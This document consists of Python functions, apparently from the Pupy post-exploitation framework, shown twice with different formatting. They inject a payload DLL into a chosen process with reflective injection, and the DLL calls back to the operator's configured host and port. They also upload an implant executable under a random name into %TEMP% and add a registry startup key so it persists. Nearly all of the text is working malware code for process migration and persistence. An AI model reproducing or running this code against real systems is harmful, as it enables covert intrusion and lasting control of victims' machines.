def run(self, args):
dllbuf=b""
isProcess64bits=False
#TODO automatically fill ip/port
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
self.success("looking for configured connect back address ...")
res=self.client.conn.modules['pupy'].get_connect_back_host()
host, port=res.rsplit(':',1)
self.success("address configured is %s:%s ..."%(host,port))
self.success("looking for process %s architecture ..."%args.pid)
if self.client.conn.modules['pupwinutils.processes'].is_process_64(args.pid):
isProcess64bits=True
self.success("process is 64 bits")
dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx64.dll"), host, port)
else:
self.success("process is 32 bits")
dllbuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.dll"), host, port)
self.success("injecting DLL in target process %s ..."%args.pid)
self.client.conn.modules['pupy'].reflective_inject_dll(args.pid, dllbuff, isProcess64bits)
self.success("DLL injected !")
self.success("waiting for a connection from the DLL ...")
while True:
c=has_proc_migrated(self.client, args.pid)
if c:
self.success("got a connection from migrated DLL !")
c.desc["id"]=self.client.desc["id"]
break
time.sleep(0.1)
try:
self.client.conn.exit()
except Exception:
pass
def run(self, args):
if args.method=="registry":
self.client.load_package("pupwinutils.persistence")
#retrieving conn info
res=self.client.conn.modules['pupy'].get_connect_back_host()
host, port=res.rsplit(':',1)
self.info("generating exe ...")
#generating exe
exebuff=genpayload.get_edit_binary(os.path.join("payloads","pupyx86.exe"), host, port)
remote_path=self.client.conn.modules['os.path'].expandvars("%TEMP%\\{}.exe".format(''.join([random.choice(string.ascii_lowercase) for x in range(0,random.randint(6,12))])))
self.info("uploading to %s ..."%remote_path)
#uploading
rf=self.client.conn.builtin.open(remote_path, "wb")
chunk_size=16000
pos=0
while True:
buf=exebuff[pos:pos+chunk_size]
if not buf:
break
rf.write(buf)
pos+=chunk_size
rf.close()
self.success("upload successful")
#adding persistency
self.info("adding to registry ...")
self.client.conn.modules['pupwinutils.persistence'].add_registry_startup(remote_path)
self.info("registry key added")
self.success("persistence added !")
else:
self.error("not implemented")
def run(self, args):
dllbuf = b""
isProcess64bits = False
#TODO automatically fill ip/port
self.client.load_package("psutil")
self.client.load_package("pupwinutils.processes")
self.success("looking for configured connect back address ...")
res = self.client.conn.modules['pupy'].get_connect_back_host()
host, port = res.rsplit(':', 1)
self.success("address configured is %s:%s ..." % (host, port))
self.success("looking for process %s architecture ..." % args.pid)
if self.client.conn.modules['pupwinutils.processes'].is_process_64(
args.pid):
isProcess64bits = True
self.success("process is 64 bits")
dllbuff = genpayload.get_edit_binary(
os.path.join("payloads", "pupyx64.dll"), host, port)
else:
self.success("process is 32 bits")
dllbuff = genpayload.get_edit_binary(
os.path.join("payloads", "pupyx86.dll"), host, port)
self.success("injecting DLL in target process %s ..." % args.pid)
self.client.conn.modules['pupy'].reflective_inject_dll(
args.pid, dllbuff, isProcess64bits)
self.success("DLL injected !")
self.success("waiting for a connection from the DLL ...")
while True:
c = has_proc_migrated(self.client, args.pid)
if c:
self.success("got a connection from migrated DLL !")
c.desc["id"] = self.client.desc["id"]
break
time.sleep(0.1)
try:
self.client.conn.exit()
except Exception:
pass
def run(self, args):
if args.method == "registry":
self.client.load_package("pupwinutils.persistence")
#retrieving conn info
res = self.client.conn.modules['pupy'].get_connect_back_host()
host, port = res.rsplit(':', 1)
self.info("generating exe ...")
#generating exe
exebuff = genpayload.get_edit_binary(
os.path.join("payloads", "pupyx86.exe"), host, port)
remote_path = self.client.conn.modules['os.path'].expandvars(
"%TEMP%\\{}.exe".format(''.join([
random.choice(string.ascii_lowercase)
for x in range(0, random.randint(6, 12))
])))
self.info("uploading to %s ..." % remote_path)
#uploading
rf = self.client.conn.builtin.open(remote_path, "wb")
chunk_size = 16000
pos = 0
while True:
buf = exebuff[pos:pos + chunk_size]
if not buf:
break
rf.write(buf)
pos += chunk_size
rf.close()
self.success("upload successful")
#adding persistency
self.info("adding to registry ...")
self.client.conn.modules[
'pupwinutils.persistence'].add_registry_startup(remote_path)
self.info("registry key added")
self.success("persistence added !")
else:
self.error("not implemented")